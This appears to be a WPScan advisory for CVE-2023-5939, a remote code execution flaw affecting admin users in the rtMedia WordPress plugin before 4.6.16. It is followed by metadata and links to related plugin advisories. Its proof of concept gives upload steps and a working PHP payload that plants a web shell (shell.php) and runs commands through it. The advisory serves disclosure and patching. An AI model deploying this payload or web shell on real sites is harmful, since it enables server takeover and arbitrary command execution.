rtMedia for WordPress, BuddyPress and bbPress < 4.6.16 – Admin+ RCE | CVE 2023-5939 | Plugin Vulnerabilities

Description

The plugin loads the contents of the import file in an unsafe manner, leading to remote code execution by privileged users.

Proof of Concept

1. As an admin, visit rtMedia > Settings > Export/Import.
2. Click the "Browse File" button beside "Import rtMedia Settings".
3. Upload a file with the extension `.json` and the following contents:

<?php file_put_contents(WP_CONTENT_DIR . '/shell.php', '<?php echo system($_GET["cmd"]);');

4. Visit `/wp-content/shell.php?cmd=id` to run arbitrary arbitrary commands.

Affects Plugins

buddypress-media

Fixed in 4.6.16

References

CVE

Classification

Type

RCE

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Alex Sanford

Submitter

Alex Sanford

Submitter website

https://wpscan.com

Verified

Yes

WPVDB ID

db5d41fc-bcd3-414f-aa99-54d5537007bc

Timeline

Publicly Published

2023-11-29 (about 2 years ago)

Added

2023-11-29 (about 2 years ago)

Last Updated

2023-12-04 (about 2 years ago)

Other

Published

Title

Published

2015-04-02

Title

SimpleCart - File Upload & Execution

Published

2023-11-21

Title

WP All Export (Free < 1.4.0, Pro < 1.8.6) - Admin+ RCE

Published

2021-03-04

Title

WooCommerce Upload Files < 59.4 - Unauthenticated Arbitrary File Upload

Published

2014-08-01

Title

Zingiri Web Shop <= 2.2.3 - ajax_file_cut.php selectedDoc Parameter Remote PHP Code

Published

2025-03-12

Title

Appointment Booking Calendar — Simply Schedule Appointments Booking Plugin < 1.6.8.7 - Unauthenticated Arbitrary Shortcode Execution